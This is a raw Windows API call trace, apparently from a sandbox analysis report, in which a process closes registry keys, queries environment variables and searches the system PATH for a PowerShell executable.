	[0693.106] RegCloseKey (hKey=0x35c) returned 0x0
	[0693.107] RegCloseKey (hKey=0x358) returned 0x0
	[0693.107] RegCloseKey (hKey=0x354) returned 0x0
	[0693.107] RegCloseKey (hKey=0x350) returned 0x0
	[0693.107] RegCloseKey (hKey=0x34c) returned 0x0
	[0693.108] RegCloseKey (hKey=0x348) returned 0x0
	[0693.108] RegCloseKey (hKey=0x344) returned 0x0
	[0693.108] RegCloseKey (hKey=0x394) returned 0x0
	[0693.109] RegCloseKey (hKey=0x334) returned 0x0
	[0693.109] RegCloseKey (hKey=0x330) returned 0x0
	[0693.109] RegCloseKey (hKey=0x32c) returned 0x0
	[0693.109] RegCloseKey (hKey=0x328) returned 0x0
	[0693.110] RegCloseKey (hKey=0x324) returned 0x0
	[0693.110] RegCloseKey (hKey=0x320) returned 0x0
	[0693.110] RegCloseKey (hKey=0x31c) returned 0x0
	[0693.111] RegCloseKey (hKey=0x2dc) returned 0x0
	[0693.111] RegCloseKey (hKey=0x390) returned 0x0
	[0693.111] RegCloseKey (hKey=0x314) returned 0x0
	[0693.111] RegCloseKey (hKey=0x2fc) returned 0x0
	[0751.290] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 1125
	os_tid = 0x18e0


Thread:
	id = 1484
	os_tid = 0x1f68

	[0732.533] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0732.538] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0732.545] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0732.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.545] CoTaskMemFree (pv=0x2f9910) 
	[0732.547] VirtualQuery (in: lpAddress=0x1c80dd80, lpBuffer=0x1c80ec40, dwLength=0x30 | out: lpBuffer=0x1c80ec40*(BaseAddress=0x1c80d000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0732.550] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0732.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.550] CoTaskMemFree (pv=0x2f9910) 
	[0732.553] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0732.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.553] CoTaskMemFree (pv=0x2f9910) 
	[0732.556] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0732.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.556] CoTaskMemFree (pv=0x2f9910) 
	[0732.573] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0732.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.573] CoTaskMemFree (pv=0x2f9910) 
	[0732.575] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0732.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.576] CoTaskMemFree (pv=0x2f9910) 
	[0732.577] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0732.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.577] CoTaskMemFree (pv=0x2f9910) 
	[0734.096] VirtualQuery (in: lpAddress=0x1c80e030, lpBuffer=0x1c80eef0, dwLength=0x30 | out: lpBuffer=0x1c80eef0*(BaseAddress=0x1c80e000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0734.097] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0734.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.097] CoTaskMemFree (pv=0x2f9910) 
	[0734.099] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0734.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.099] CoTaskMemFree (pv=0x2f9910) 
	[0734.100] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0734.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.100] CoTaskMemFree (pv=0x2f9910) 
	[0734.101] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0734.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.101] CoTaskMemFree (pv=0x2f9910) 
	[0734.108] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0734.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.109] CoTaskMemFree (pv=0x2f9910) 
	[0735.523] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0735.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.523] CoTaskMemFree (pv=0x2f9910) 
	[0735.525] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0735.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.526] CoTaskMemFree (pv=0x2f9910) 
	[0735.527] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0735.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.527] CoTaskMemFree (pv=0x2f9910) 
	[0736.825] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0736.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.826] CoTaskMemFree (pv=0x2f9910) 
	[0736.827] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0736.827] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.827] CoTaskMemFree (pv=0x2f9910) 
	[0736.829] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0736.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.829] CoTaskMemFree (pv=0x2f9910) 
	[0736.831] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0736.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.831] CoTaskMemFree (pv=0x2f9910) 
	[0736.882] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0736.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.882] CoTaskMemFree (pv=0x2f9910) 
	[0752.623] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0752.623] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0752.624] CoTaskMemFree (pv=0x2f9910) 
	[0752.627] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0752.627] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0752.627] CoTaskMemFree (pv=0x2f9910) 
	[0752.627] CoTaskMemAlloc (cb=0x128) returned 0x253c70
	[0752.627] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x253c70, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0752.627] CoTaskMemFree (pv=0x253c70) 
	[0752.632] CoTaskMemAlloc (cb=0x20e) returned 0x1b8c35e0
	[0752.632] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8c35e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0752.632] CoTaskMemFree (pv=0x1b8c35e0) 
	[0752.636] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0752.640] SetErrorMode (uMode=0x1) returned 0x1
	[0753.866] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0753.876] SetErrorMode (uMode=0x1) returned 0x1
	[0753.878] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0753.878] SetErrorMode (uMode=0x1) returned 0x1
	[0753.878] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0753.886] SetErrorMode (uMode=0x1) returned 0x1
	[0753.888] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0753.888] SetErrorMode (uMode=0x1) returned 0x1
	[0753.888] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0753.897] SetErrorMode (uMode=0x1) returned 0x1
	[0753.898] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0753.899] SetErrorMode (uMode=0x1) returned 0x1
	[0753.899] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0755.094] SetErrorMode (uMode=0x1) returned 0x1
	[0755.096] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0755.096] SetErrorMode (uMode=0x1) returned 0x1
	[0755.096] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0755.104] SetErrorMode (uMode=0x1) returned 0x1
	[0755.106] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0755.106] SetErrorMode (uMode=0x1) returned 0x1
	[0755.106] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0755.114] SetErrorMode (uMode=0x1) returned 0x1
	[0755.115] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0755.116] SetErrorMode (uMode=0x1) returned 0x1
	[0755.116] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0755.125] SetErrorMode (uMode=0x1) returned 0x1
	[0755.126] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0755.127] SetErrorMode (uMode=0x1) returned 0x1
	[0755.127] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0755.135] SetErrorMode (uMode=0x1) returned 0x1
	[0755.136] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0755.136] SetErrorMode (uMode=0x1) returned 0x1
	[0755.136] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0756.582] SetErrorMode (uMode=0x1) returned 0x1
	[0756.584] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0756.584] SetErrorMode (uMode=0x1) returned 0x1
	[0756.584] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0756.593] SetErrorMode (uMode=0x1) returned 0x1
	[0756.594] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0756.594] SetErrorMode (uMode=0x1) returned 0x1
	[0756.594] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0756.603] SetErrorMode (uMode=0x1) returned 0x1
	[0756.604] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0756.604] SetErrorMode (uMode=0x1) returned 0x1
	[0756.604] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0756.612] SetErrorMode (uMode=0x1) returned 0x1
	[0756.614] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0756.614] SetErrorMode (uMode=0x1) returned 0x1
	[0756.614] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.104] SetErrorMode (uMode=0x1) returned 0x1
	[0758.106] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0758.106] SetErrorMode (uMode=0x1) returned 0x1
	[0758.106] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.114] SetErrorMode (uMode=0x1) returned 0x1
	[0758.115] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0758.116] SetErrorMode (uMode=0x1) returned 0x1
	[0758.116] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.124] SetErrorMode (uMode=0x1) returned 0x1
	[0758.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.125] SetErrorMode (uMode=0x1) returned 0x1
	[0758.125] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.126] SetErrorMode (uMode=0x1) returned 0x1
	[0758.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.126] SetErrorMode (uMode=0x1) returned 0x1
	[0758.126] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.127] SetErrorMode (uMode=0x1) returned 0x1
	[0758.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.127] SetErrorMode (uMode=0x1) returned 0x1
	[0758.127] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c80df60 | out: lpFindFileData=0x1c80df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.127] SetErrorMode (uMode=0x1) returned 0x1
	[0758.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0758.128] SetErrorMode (uMode=0x1) returned 0x1
